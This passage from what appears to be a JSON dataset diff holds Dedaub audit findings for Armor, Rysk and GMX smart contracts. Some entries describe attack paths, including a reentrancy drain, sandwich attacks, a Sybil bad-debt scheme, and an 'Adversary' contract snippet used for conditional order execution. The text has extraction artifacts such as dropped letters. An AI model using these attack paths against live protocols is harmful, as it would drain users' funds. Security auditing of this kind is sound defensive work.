Status Open In contract ArmorGovernor.sol the parameters of several functions are declared as uint256, whereas most numerical variables are declared as uint. We suggest that a single style of declaration is used for clarity and consistency.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "code style regarding subtractions Resolved In contract ArmorGovernor.sol functions cancel() and propose() include same subtraction operation (block.number - 1) twice but with slightly different implementation. One is executed immediately, while the other uses a safety checking function sub256(). In propose(): 6 require(varmor.getPriorVotes(msg.sender, sub256(block.number, 1)) > proposalThreshold(block.number - 1), Similar in cancel(). Underow seems unlikely in this case, however we suggest that all subtractions are performed in the same way for consistency.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "errors in error messages Partially resolved (error in AcceptGov() remains) In contract Timelock.sol functions acceptGov() and setPendingGov() contain a typo in the error messages of a requirement. In acceptGov(): require(msg.sender == address(this), \"Timelock::setPendingAdmin: Call must come from Timelock.\"); Should become: require(msg.sender == address(this), \"Timelock::setPendingGov: Call must come from Timelock.\"); Similar for setPendingGov().", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "event emitted Resolved In contract Timelock.sol the function setPendingGov() emits a wrong event. emit NewPendingAdmin(pendingGov); Should become emit NewPendingGov(pendingGov); 7", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "error messages Resolved In contract Timelock.sol the functions which are admin- or gov-only refer only to admin when it comes to authorization-related error messages. For example, in function queueTransaction() require(msg.sender == admin || msg.sender == gov, \"Timelock::queueTransaction: Call must come from admin.\"); Similar for functions cancelTransaction(), executeTransaction(). We suggest that the error messages are extended to include gov as well.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "code reuse Info In contract vArmor.sol the Checkpoint struct is used to record both account votes (storage variable checkpoints) and the total token supply (storage variable checkpointsTotal) while the struct eld is named votes, making the code slightly harder to follow. For example, in function _writeCheckpointTotal we inspect the following checkpointsTotal[nCheckpoints - 1].votes = newTotal; A7 Floating pragma Info Use of a oating pragma: The oating pragma pragma solidity ^0.6.6; is used in the Timelock contract allowing it to be compiled with any version of the Solidity compiler that is greater or equal to v0.6.6 and lower than v.0.7.0. Although the differences between these versions are small, oating pragmas should be avoided and the pragma should be xed to the version that will be used for the contracts deployment. ArmorGovernance contract uses pragma solidity ^0.6.12; which can be altered to the identical and simpler pragma solidity 0.6.12;.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "is susceptible to front-running RESOLVED The OptionExchange contracts redeem() function calls _swapExactInputSingle() with minimum output set to 0, making it susceptible to a front-running/sandwich aack when collateral is being liquidated. It is recommended that a minimum representing an acceptable loss on the swap is used instead. // OptionExchange::redeem function redeem(address[] memory _series) external { _onlyManager(); uint256 adLength = _series.length; for (uint256 i; i < adLength; i++) { // ... Dedaub: Code omied for brevity. if (otokenCollateralAsset == collateralAsset) { // ... Dedaub: Code omied for brevity. } else { // Dedaub: Minimum output set to 0. Susceptible to sandwich aacks. uint256 redeemableCollateral = _swapExactInputSingle(redeemAmount, 0, otokenCollateralAsset); SafeTransferLib.safeTransfer( ERC20(collateralAsset),address(liquidityPool),redeemableCollateral ); emit RedemptionSent( redeemableCollateral, collateralAsset, address(liquidityPool) ); } } } H2 VolatilityFeed updates are susceptible to front-running DISMISSED The VolatilityFeed contract uses the SABR model to compute the implied volatility of an option series. This model uses a number of parameters which are regularly updated by a keeper through the updateSabrParameters() function. It is possible for an aacker to front-run this update, transact with the LiquidityPool at the old price and then transact back with the LiquidityPool at the new price (computed in advance) if the dierence is protable. The Rysk team has indicated that trading will be paused for a few blocks to allow for parameter updates to happen and to eectively prevent this situation. MEDIUM SEVERITY: ID Description M1 No staleness check on the volatility feed ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": " ACKNOWLEDGED The function quoteOptionPrice of the BeyondPricer contract retrieves the implied volatility from the function VolatilityFeed::getImpliedVolatility(). However, the returned value is not accompanied by a timestamp that can be used by the quoteOptionPrice() function to determine whether the value is stale or not. Since the implied volatility returned is aected by a keeper, which is responsible for updating the parameters of the underlying SABR model, it is recommended that staleness checks are implemented in order to avoid providing wrong implied volatility values. 5 LOW SEVERITY: ", + "labels": [ + "Dedaub", + "Rysk", + "Severity: High" + ] + }, + { + "title": "use of price feeds for the price of the underlyin ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": " DISMISSED The BeyondPrice contract gets the price of the underlying token via the function _getUnderlyingPrice(), which consults a Chainlink price feed for the price. // BeyondPrice::_getUnderlyingPrice function _getUnderlyingPrice(address underlying, address _strikeAsset) internal view returns (uint256) { } return PriceFeed(protocol.priceFeed()). getNormalizedRate(underlying, _strikeAsset); However, when trying to obtain the same price in the function _getCollateralRequirements(), the addressBook is used to get the price feed from an Oracle implementing the IOracle interface. // BeyondPrice::_getCollateralRequirements function getCollateralRequirements( Types.OptionSeries memory _optionSeries, uint256 _amount ) internal view returns (uint256) { IMarginCalculator marginCalc = IMarginCalculator(addressBook.getMarginCalculator()); return marginCalc.getNakedMarginRequired( _optionSeries.underlying, _optionSeries.strikeAsset, _optionSeries.collateral, _amount / SCALE_FROM, _optionSeries.strike / SCALE_FROM, // assumes in e18 IOracle(addressBook.getOracle()).getPrice(_optionSeries.underlying), _optionSeries.expiration, 18, // always have the value return in e18 _optionSeries.isPut ); } The same addressBook technique is used in the getCollateral() function of the OptionRegistry contract and in the checkVaultHealth() function of the Option registry contract. It is recommended that this is refactored to use the Chainlink feed in order to avoid a situation where dierent prices for the underlying are obtained by dierent parts of the code. The Rysk team intends to keep the price close to what the Opyn system would quote, thus using the Opyn chainlink oracle is actually correct as it represents the actual situation that would occur for these given quotes L2 Multiple uses of div before mul in OptionExchanges _handleDHVBuyback() function RESOLVED In the OptionExchange contracts _handleDHVBuyback() function, a division is used before a multiplication operation at lines 925 and 932. It is recommended to use multiplication prior to division operations to avoid a possible loss of precision in the calculation. Alternatively, the mulDiv function of the PRBMath library could be used. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "reentrancy in OptionRegistry::redeem() ACKNOWLEDGED The OptionRegistrys redeem() function is not access controlled and calls the OpynInteractions library contracts redeem() function, which interacts with the GammaController and the option and collateral tokens. Dedaubs static analysis tools warned about a potential reentrancy risk. Our manual inspection identied no such immediate risk, but as the tokens supported are not strictly dened and a future version of the code could potentially make such an aack possible, it is advisable to add a reentrancy guard around OptionRegistrys redeem() function.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "optimisation in OptionRegistrys open() function ACKNOWLEDGED The OptionRegistry::open() function performs the assignment vaultIds[series] = vaultId_ on line 271. But this can be moved into the if block starting at line 255, since the vaultId_ only changes value if this if block is executed. // OpenRegistry::open function open( address _series, uint256 amount, uint256 collateralAmount ) external returns (bool, uint256) { _isLiquidityPool(); // make sure the options are ok to open Types.OptionSeries memory series = seriesInfo[_series]; // assumes strike in e8 if (series.expiration <= block.timestamp) { revert AlreadyExpired(); } // ... Dedaub: Code omied for brevity. if (vaultId_ == 0) { vaultId_ = (controller.getAccountVaultCounter(address(this))) + 1; vaultCount++; } // ... Dedaub: Code omied for brevity. // Dedaub: Below assignment can be moved inside the above block. vaultIds[_series] = vaultId_; // returns in collateral decimals return (true, collateralAmount); }", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "comment in OptionExchanges _swapExactInputSingle() function RESOLVED The OptionExchanges _swapExactInputSingle() function denition is annotated with several misleading comments. For instance, it mentions that _amountIn has to be in WETH when it can support any collateral token. It also mentions that _assetIn is the stablecoin that is bought, when it is in fact the collateral that is swapped. The description of the function, which reads function to sell exact amount of WETH to decrease delta is incorrect. // OptionExchange::_swapExactInputSingle /** @notice function to sell exact amount of wETH to decrease delta * @param _amountIn the exact amount of wETH to sell * @param _amountOutMinimum the min amount of stablecoin willing to receive. Slippage limit. * @param _assetIn the stablecoin to buy * @return the amount of usdc received */ function _swapExactInputSingle( 1 uint256 _amountIn, uint256 _amountOutMinimum, address _assetIn) internal returns (uint256) { // ... Dedaub: Code omied for brevity. }", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "comment in BeyondPricers _getSlippageMultiplier() function RESOLVED The division of the _amount by 2, mentioned in the code comment, does not appear in the code. It appears that this comment corresponds to a previous version of the codebase and it should be removed. //BeyondPricer::_getSlippageMultiplier function _getSlippageMultiplier( uint256 _amount, int256 _optionDelta, int256 _netDhvExposure, bool _isSell ) internal view returns (uint256 slippageMultiplier) { // divide _amount by 2 to obtain the average exposure throughout the tx. // Dedaub: The above comment is not relevant any more. // ... Dedaub: Code omied for brevity. }", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "librarys lognormalVol() can in principle return negative values ACKNOWLEDGED The formula of the SABR model that is responsible for computing the implied volatility (hps://web.math.ku.dk/~rolf/SABR.pdf formula (2.17a)) is an approximate one. It is not clear to us if this value will always be non-negative as it should be. For example, 1 for absolute values of close to 1 and large values of v, the last term of this formula, and probably the whole value of the implied volatility will be negative. The execution of VolatilityFeed::getImpliedVolatility will revert if the value returned by lognormalVol() is non-negative, to protect the protocol from using this absurd value. Nevertheless, if this keeps happening for a while, the protocol will be unable to price the options and therefore will be unable to work. This issue could be avoided either by a careful choice of the SABR parameters by the protocols keepers or by using an alternative volatility feed in case this happens.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "check in BeyondPricers quoteOptionprice() RESOLVED In BeyondPricer::quoteOptionPrice() a check that _optionseries.expiration >= block.timestamp is missing. If the function is called to price an option series with a past expiration date, it will return an absurd result. We suggest adding a check that would revert the execution with an appropriate message in case the condition is not satised.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "is dened as public even though its name suggests otherwise RESOLVED Function OptionExchange::_checkHash, which returns if an option series is approved or not, is dened as public. However, the starting underscore in _checkHash implies that this functionality should not be exposed externally (via the public modier) creating an inconsistency, even though it is probably useful/necessary to the users of the protocol.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "returns an incorrect value RESOLVED Whenever a user wants to buy an amount of options, rst it is checked if the long exposure of the protocol to this option series is positive. If this is the case, then the protocol rst sells the options it holds, to decrease its long exposure, and if they are not 1 enough, then the Liquidity pool writes extra options to reach the amount requested by the user. The problem is that the _buyOption function, in the case the Liquidity pool is called to write these extra options, returns only this extra amount, and not the total amount sold to the user.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "of compiler versions RESOLVED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. It is recommended that the compiler version is xed to a specic version and that this is kept consistent amongst source les. A10 Compiler bugs ACKNOWLEDGED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. Versions 0.8.0 and 0.8.9 in particular, have some known bugs, which we do not believe aect the correctness of the contracts. 1", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "has unlimited spending approval RESOLVED In the GmxHedgingReactor constructor the gmxPositionRouter is approved to spend an innite amount of _collateralAsset. It appears that this is unneeded and potentially dangerous, as the transfer of _collateralAsset is actually handled by the 0 GMX router, which gets approved for the exact amount needed in the function _increasePosition, and not by the gmxPositionRouter.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "returns in _changePosition RESOLVED The function GmxHedgingReactor::_changePosition is not consistent with the values it returns. Even though it should always return the resulting dierence in delta exposure, it does not do so at the end of the if-branch of the if (_amount > 0) { } statement. If the control flow reaches that point, it jumps at the end of the function leading to 0 being returned, i.e., as if there was no change in delta. function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. // Dedaub: last statement is not a return increaseOrderDeltaChange[positionKey] += deltaChange; } else { // .. return deltaChange + closedPositionDeltaChange; } return 0; } We would suggest the following xes: function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. return deltaChange + closedPositionDeltaChange; } else if (_amount < 0) { // .. return deltaChange + closedPositionDeltaChange; } 0 return 0; } Currently the return value of _changePosition is further returned by the function hedgeDelta and remains unused by its callers. However, this could change in future versions of the protocol leading to bugs.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "long and short positions could co-exist RESOLVED GMX treats longs and shorts as completely separate positions, and charges borrowing fees on both simultaneously, thus the reactor deals with positions in such a way that ensures only a single position is open at a certain time. Nevertheless, due to the two-step process that GMX uses to create positions and the fact that the reactor does not take into account that a new position might be created while another one is waiting to be nalized, there exists a scenario in which the reactor could end up with a long and a short position at the same time. The scenario is the following: 1. Initially, there are no open positions 2. A long or short position is opened on GMX but is not executed immediately, i.e., GmxHedgingReactor::gmxPositionCallback is not called. The LiquidityPool reckons that a counter position should be opened and calls GmxHedgingReactor::hedgeDelta to do so. 3. When the two position orders are nally executed by GMX the reactor will have a long and a short position open simultaneously. The above scenario might not be likely to happen as it requires the LiquidityPool to open two opposite positions in a very short period of time, i.e., before the rst position order is executed by a GMX keeper or a keeper of the protocol. Nevertheless, we believe it would be beer to also handle such a scenario, as it could mess up the reactors accounting and the x should be relatively easy. 0", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "in some cases underestimates the extra collateral needed for an increase of a position ACKNOWLEDGED Whenever the hedging reactor asks for an increase of a position, _getCollateralSizeDeltaUsd() computes the extra collateral needed using collateralToTransfer (collateral needed to be added or removed from the position before its increase, to maintain the health to the desired value) and extraPositionCollateral (the extra collateral needed for the increase of the position).If isAboveMax==true and extraPositionCollateral > collateralToTransfer, then the collateral which is actually added is just totalCollateralToAdd= extraPositionCollateral - collateralToTransfer, which could be not suicient to collateralize the increased position. Let us try to explain this with an example. Suppose that initially there is a long position with position[0]=10_000, position[1]=5_000. Hedging reactor then asks for an increase of its position by 11_000. extraPositionCollateral will be 5_500. Suppose than in the meantime this position had substantial prots i.e. positive unrealised pnl=5_000. colateralToTransfer will be 5_000 and totalCollateralToAdd will be 5_500-5_000=500. Therefore the \"leverage without pnl\" of the new position will be (10_000+11_000)/(5_000+500)=21_000/5_500=3.8. If this scenario is repeated, it could lead to the liquidation of the position. We suggest adding a check that the total size of the position does not exceed its total collateral times maxLeverage, similar to the one used in the case of decreasing a position. 07 LOW SEVERITY: ID Descriptio ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "does not remove the old PositionRouter RESOLVED The function GmxHedgingReactor::setPositionRouter sets gmxPositionRouter to the new GMX PositionRouter contract that is provided and calls approvePlugin on the GMX Router contract to approve it. It does not revoke the approval to the old PositionRouter contract, which from now on is irrelevant to the reactor, by calling the function denyPlugin of the GMX Router contract. L2 Potential underflow in CheckVaultHealth RESOLVED If a position is in loss, the formula of the health variable is the following one: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():344 health=(uint256((int256(position[1])-int256(position[8])).div(int256(posit ion[0]))) * MAX_BIPS) / 1e18; There is no check if the dierence (int256(position[1])-int256(position[8])) in the above formula is positive or not. It is possible, under specic economic conditions (and if the GMX Liquidators are not fast enough), that the result of this dierence is negative. In such a case, the resulting value will be erroneous because of an underflow error. Even if this scenario is not expected to happen on a regular basis, we suggest adding a check that this dierence is indeed positive and if it is not extra measures should be taken to avoid liquidations. Note that the same issue appears in getPoolDenominatedValue, leading to the execution reverting if an underflow occurs. 0 CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Low" + ] + }, + { + "title": "wastes gas ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": " INFO The function GmxHedgingReactor::getPoolDenominatedValue wastes gas by calling the function checkVaultHealth to retrieve just the currently open GMX position instead of directly calling the _getPosition function.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "can be made more gas eicient INFO The function GmxHedgingReactor::gmxPositionCallback is responsible for updating the internalDelta of the reactor with the values that are stored in the mappings increaseOrderDeltaChange and decreaseOrderDeltaChange. These mappings are essentially used as temporary storage before the change in delta is applied to the internalDelta storage variable. Thus, after a successful update the associated mapping element should be deleted to receive a gas refund for freeing up space on the blockchain.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "can be made more gas eicient INFO The function GmxHedgingReactor::sync is implemented to consider the scenario where a long and a short position are open on GMX at the same time. function sync() external returns (int256) { _isKeeper(); uint256[] memory longPosition = _getPosition(true); uint256[] memory shortPosition = _getPosition(false); uint256 longDelta = longPosition[0] > 0 ? 01 (longPosition[0]).div(longPosition[2]) : 0; uint256 shortDelta = shortPosition[0] > 0 ? (shortPosition[0]).div(shortPosition[2]) : 0; internalDelta = int256(longDelta) - int256(shortDelta); return internalDelta; } However, the reactor in whole is implemented in a way that ensures that a long and a short position cannot co-exist. Thus, the sync function can be implemented to take into account only the current open position, making it more eicient in terms of gas usage.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "computations INFO In GmxHedgingReactor::_getCollateralSizeDeltaUsd there is the following code: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():670 if ( int256(position[1] / 1e12) - int256(adjustedCollateralToRemove) < int256(((position[0] - _getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000)) ) { adjustedCollateralToRemove = position[1] / 1e12 - ((position[0]-_getPositionSizeDeltaUsd(_amount,position[0])) / 1e12) / (vault.maxLeverage() / 11000); if (adjustedCollateralToRemove == 0) { return 0; } } Observe that the quantity (position[0]-_getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000) is computed twice which can be avoided by computing it once and storing its value to a local variable. The same 01 is true for the quantity _amount.mul(position[2] / 1e12).div(position[0] / 1e12) that appears twice in the following computation: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():651 collateralToRemove = (1e18 - ( (int256(position[0]/1e12)+int256((leverageFactor.mul(position[8]))/1e12)) .mul(1e18-int256(_amount.mul(position[2]/1e12).div(position[0]/1e12))) .div(int256(leverageFactor.mul(position[1])/1e12)) )).mul(int256(position[1]/1e12)) - int256(_amount.mul(position[2]/1e12).div(position[0]/1e12) .mul(position[8]/1e12)); The above computation can be simplied even further by applying specic mathematical properties: uint256 d = _amount.mul(position[2]).div(position[0]); collateralToRemove = (int256(position[1] / 1e12) - ( ((int256(position[0]) + int256(leverageFactor.mul(position[8]))) / 1e12) .mul(1e18 - int256(d)).div(int256(leverageFactor)) )) - int256(d.mul(position[8] / 1e12));", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "calls INFO The functions _increasePosition and _decreasePosition of the reactor unnecessarily call gmxPositionRouters minExecutionFee function twice each instead of caching the returned value in a local variable after the rst call.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "comment in _increasePosition INFO 01 The comment describing the parameter _collateralSize of the function _increasePosition should read amount of collateral to add instead of \"amount of collateral to remove.", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk GMX Hedging Reactor Audit.pdf", + "body": "errors The following errors are dened but not used: INFO // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():88 error ValueFailure(); error IncorrectCollateral(); error IncorrectDeltaChange(); error InvalidTransactionNotEnoughMargin(int256 accountMarketValue, int256 totalRequiredMargin); A8 Compiler bugs INFO The code is compiled with Solidity 0.8.9, which, at the time of writing, has some known bugs, which we do not believe to aect the correctness of the contracts. 01", + "labels": [ + "Dedaub", + "Rysk GMX Hedging Reactor", + "Severity: Informational" + ] + }, + { + "title": "vulnerability in cancelOrde ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": " OPEN OrderHandler::cancelOrder, which is an external function, is not protected by a reentrancy guard. Moreover, OrderUtils::cancelOrder (which performs the actual operation) transfers funds to the user (orderStore.transferOut) before updating its state. As a consequence, a malicious adversary could re-enter in cancelOrder, and execute an arbitrary number of transfers, eectively draining the contracts full balance in the corresponding token. function cancelOrder( DataStore dataStore, EventEmitter eventEmitter, OrderStore orderStore, bytes32 key, address keeper, uint256 startingGas ) internal { Order.Props memory order = orderStore.get(key); validateNonEmptyOrder(order); if (isIncreaseOrder(order.orderType()) || isSwapOrder(order.orderType())) { if (order.initialCollateralDeltaAmount() > 0) { orderStore.transferOut( EthUtils.weth(dataStore), order.initialCollateralToken(), order.initialCollateralDeltaAmount(), order.account(), order.shouldConvertETH() ); } } // Dedaub: state changed after the transfer, also idempotent orderStore.remove(key, order.account()); Note that the main re-entrancy method, namely the receive hook of an ETH transfer, is in fact protected by using payable(receiver).transfer which limits the gas available to the adversarys receive hook. Nevertheless, an ER", + "labels": [ + "Dedaub", + "GMX", + "Severity: Critical" + ] + }, + { + "title": "transfer is an external contract call and should be assumed to potentially pass the execution to the adversary. For instance, an ERC777 token (which is ERC20 compatible) would implement transfer hooks that could easily be used to perform a reentrancy aack. Note also that the state update (orderStore.remove(key, order.account())) is idempotent, so it can be executed multiple times during a reentrancy aack without causing an error. To protect against reentrancy we recommend 1. Adding reentrancy guards, and 2. Execute all state updates before external contract calls (such as transfers). Note that (2) by itself is suicient, so reentrancy guards could be avoided if gas is an issue. In such a case, however, comments should be added to the code to clearly state that updates should be executed before external calls, to avoid a vulnerability being reintroduced in future restructuring of the code. HIGH SEVERITY: ID Description ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "", + "labels": [ + "Dedaub", + "GMX", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "execution of orders using shouldConvertETH OPEN For all order types that involve ETH, a user can set the option shouldConvertETH =true to indicate that he wishes to receive ETH instead of WETH. Although convenient, this gives an adversary the opportunity to execute conditional orders in a very easy way. The adversary can simply use a smart contract as the receiver of the order, and set a receive function as follows: contract Adversary { bool allow_execution = false; receive() { require(allow_execution); } } Then, in the time period between the order creation and its execution, the adversary can decide whether he wishes the order the allow_execution variable accordingly. If unset, the receive function will revert and the protocol will cancel the order. to succeed or not, and set The possibility of conditional executions could be exploited in a variety of dierent scenarios, a concrete example is given at the end of this item. Note that the use of payable(receiver).transfer (in Bank::_transferOutEth) does not protect against this aack. The 2300 gas sent by transfer are enough for a simple check like the one above. Note also that, although the case of ETH is the simplest to exploit, any tokens that use hooks to allow the receiver to reject transfers (eg ERC777) would enable the same aack. Note also that, if needed, the time period between creation and execution could be increased by simultaneously submiing a large number of orders for tiny amounts (see L2 below). One way to protect against conditional execution is to employ some manual procedure for recovering the funds in case of a failed execution (for instance, keeping the funds in an escrow account), instead of simply canceling the order. Since a failed execution should not happen under normal conditions, this would not aect the protocols normal operation. Concrete example of exploiting conditional executions: The adversary wants to take advantage of the volatility of ETH at a particular moment, but without any trading risk. Assume that the current price of ETH is 1000 USD, he proceeds as follows: - He creates a market swap order A to buy ETH at the current price. In this order, he sets shouldConvertETH = true and the receive function above that conditionally allows the execution. - He also creates a limit order B to sell ETH at 1010 USD. He then monitors the price of ETH before the orders execution: - If ETH goes down, he does nothing. allow_execution is false so order A will fail, and order B will also fail since the price target is not met. - If ETH goes up, he sets allow_execution = true, which leads to both orders succeeding for a prot of 10 USD / ETH. 9 MEDIUM SEVERITY: ", + "labels": [ + "Dedaub", + "GMX", + "Severity: High" + ] + }, + { + "title": "handling of rebalancing token ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": " OPEN StrictBank::recordTokenIn computes the number of received tokens by comparing the contract's current balance with the balance at the previous execution. However, this approach could lead to incorrect results in the case of ER", + "labels": [ + "Dedaub", + "GMX", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "with non-standard behavior, for instance: - Tokens in which balances automatically increase (without any transfers) to include interest. - Tokens that allow interacting from multiple contract addresses To be more robust with respect to such types of tokens, we recommend comparing the balance before and after the current incoming transfer, and not between dierent transactions.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "bad debt aack OPEN The protocol is susceptible to an aack involving opening a delta neutral position using Sybil accounts, with maximum leverage, on a volatile asset. Scenario: 1. Aacker controls Alice and Bob 2. Alice opens a large long position with maximum leverage 3. Bob opens a large short position with maximum leverage 4. Market moves 5. Alice liquidates their underwater position, causing bad debt 6. Bob closes their other position, proting on the slippage The reason why this aack is possible is that using the current design, it takes multiple blocks for a liquidator to react and by that time their order is executed it is possible that one of the positions is underwater. Secondly, when liquidating, Alice does not suer a bad price from the slippage incurred in the liquidation but Bob benets from the 1 slippage, when closing their position just after. Another factor that contributes towards this aack is that the liquidation penalty is linear, while the price impact advantage is higher-order, making the aack increasingly protable the larger the positions. To deter this, the protocol could support (i) partial liquidations for large positions and therefore force the positions to be closed gradually, making the aack non-viable, and, (ii) slippage open-interest calculations used to determine the price of the liquidation. LOW SEVERITY:", + "labels": [ + "Dedaub", + "GMX", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "receive function OPEN OrderStore does not contain a receive function so it cannot receive ETH. However, this is needed by Bank::_transferOutEth, which withdraws ETH before sending it to the 